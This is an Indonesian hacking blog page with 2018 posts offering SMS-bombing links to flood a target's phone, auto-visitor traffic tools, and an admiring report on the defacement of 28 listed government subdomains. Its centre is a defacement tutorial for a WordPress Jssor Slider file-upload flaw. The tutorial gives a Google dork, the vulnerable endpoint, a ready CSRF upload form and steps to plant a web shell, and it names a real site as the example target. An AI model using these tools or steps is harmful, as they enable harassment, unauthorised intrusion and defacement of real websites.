Sunday, May 27, 2018

Trik BOM SMS Online 2019

BOM SMS ONLINE TERBARU


Oke pada kesempatan kali ini, gw mau share nihh trik Bom sms atau Spam sms JD.ID dan lain-lain, kelebihan tools ini yaitu :

- Digunakan secara online
- Tidak menyedot pulsa
- Bisa digunain dimana saja, kapan saja :v

Gausah basa basi nihh tinggal klik :

1. LINK 1
2. LINK 2
3. LINK 3

Cara gunainnya mudah gan, tinggal masukan nope target misal 08xxxx atau juga bisa +628xxx

Dah gitu aja gan, gunain tool ini baik baik, jangan berlebihan, karena sesungguhnya sesuatu yg berlebihan itu tidak baik. :*
Bila ada saran atau komentar, berkomentarlah dengan baik dan sopan.

Auto Visitor Blog 2018

Tool Auto visitor blog online 2018


Mau blog kamu banyak pengunjung? klik auto visitor dibawah ini gaes. Tapi inget yaa, gunain auto visitor juga memiliki kelemahan

Berikut kumpulan auto visitor 2018 :

Auto visitor blog 1

Auto visitor blog 2

Auto visitor blog 3

Auto visitor blog 4

Auto visitor blog 5

Auto visitor blog 6

Auto visitor blog 7


Terimakasih bagi agan agan yg sudah menyiapkan link tersebut :)
Jika ada pertanyaan atau komentar silahkan komentar dengan baik.


Saturday, May 19, 2018

Deface Jssor Arbitary File Upload Exploit Wordpress

Jssor Arbitary File Upload Exploit Wordpress


Assalamualaikum wr.wb
Hai hai bertemu lagi nihh dengan gw yang cakep ini eaa :v
oke dikesempatan ini gw mau bagi Tutorial Deface  Jssor Arbitary File Upload Exploit Wordpress






Alat dan bahan :

- Sc deface ( buat simple aja gpp )
- Dork
inurl:/wp-content/jssor-slider/ site:
-Shell IndoXploit
-Exploit
/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
-CSRF
<html>
<body>
<form action="SITE.COM/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Setelah semuanya siap lanjut kesini gan
1. Dorking dulu di google


inurl:/wp-content/jssor-slider/ site:br
inurl:/wp-content/jssor-slider/ site:my
site:id You knowlah kembangin dikit

2. Masukkan exploit seperti ini site.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

contoh :
http://www.regional.fm.br/site/wp-content/jssor-slider/jssor-uploads/
Tambahin exploit /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

jadi begini
http://www.regional.fm.br/site/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

Jika vuln akan ada keterangan seperti ini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}



3. Masukkan link tersebut ke dalam csrf. Simpan csrf dengan format html

Contoh :


4. Buka CSRF tersebut menggunakan browser, upload shell kalian



5. Akses shell disini gan
/wp-content/jssor-slider/jssor-uploads/nama shell.php

Referensi :

https://adewa-official.blogspot.co.id

Tuesday, May 1, 2018

Subdomain Website Esdm Diretas Hacker Dengan Kodename SPEEDY-03



28 Subdomain Esdm Diretas Hacker
Hacker dengan kode name SPEEDY-03 meretas subdomain esdm sebanyak 28, Hacker tersebut bahkan mengganti tampilan asli website tersebut dan menyampaikan pesan kepada pemerintah tentang aset indonesia yang akan dilelang diluar negeri. SPEEDY-03 ini merupakan hacker yang mempunyai skil diatas rata rata. berikut daftar subdomain yang diretas pelaku hacker tersebut :

http://airtanah.esdm.go.id/
http://ayomudik.esdm.go.id/
http://badan-geologi.esdm.go.id/
http://bahan.esdm.go.id/
http://bkat.esdm.go.id/
http://data.esdm.go.id/
http://datin.djk.esdm.go.id/
http://dbkerjasama.esdm.go.id/
http://dev.esdm.go.id/
http://develop.esdm.go.id/
http://e-pengawasan.esdm.go.id/
http://eappraisal.esdm.go.id/
http://ftpmenteri.esdm.go.id/
http://helpdesk.esdm.go.id/
http://kerjasama.djk.esdm.go.id/
http://konsultasi.esdm.go.id/
http://monev-apbn.esdm.go.id/
http://newsletter.esdm.go.id/
http://ppid.esdm.go.id/
http://prokum.esdm.go.id/
http://program.djk.esdm.go.id/
http://rekonbpk.esdm.go.id/
http://sib.ebtke.esdm.go.id/
http://sjp2.esdm.go.id/
http://sjr.esdm.go.id/
http://terimacpns.esdm.go.id/
http://up3i.esdm.go.id/
http://upk.esdm.go.id/

Dan berikut pesan yg disampaikan hacker tersebut :
Jangan lelang Aset Negara !
Selamatkan Aset Indonesia dari TIKUS TIKUS pemerintah dan asing !
KAMI RAKYAT BIASA BISA APA ? !

Pelaku hacker tersebut juga mengatasnamakan nama teamnya yaitu TYPICAL IDIOT SECURITY, team yang sangat disegani dikalangan underground karena meretas beberapa website besar, Dan berikut kode nama yg tercantum diwebsite tersebut :

Khunerable - SPEEDY-03 - PYS404 - Mirav - Grac3 - AnoaGhost - Jje Incovers - Panataran - Magelang6etar

Peretasan tersebut harusnya menjadi perhatian pemerintah tentang aspirasi yang disampaikan hacker tersebut, dan pemerintah lebih menjaga keamanan websitenya, sampai berita ini dirilis belum ada perbaikan maupun tanggapan dari pemerintah.

Penulis :
Bagus Lindu Pamungkas

Cara Membuka Situs Yang Diblokir

Hallo guys kembali lagi nih bersama smankamedia, Ngomongin tentang perkembangan smartphone memang tidak ada habisnya smartphone kini di ...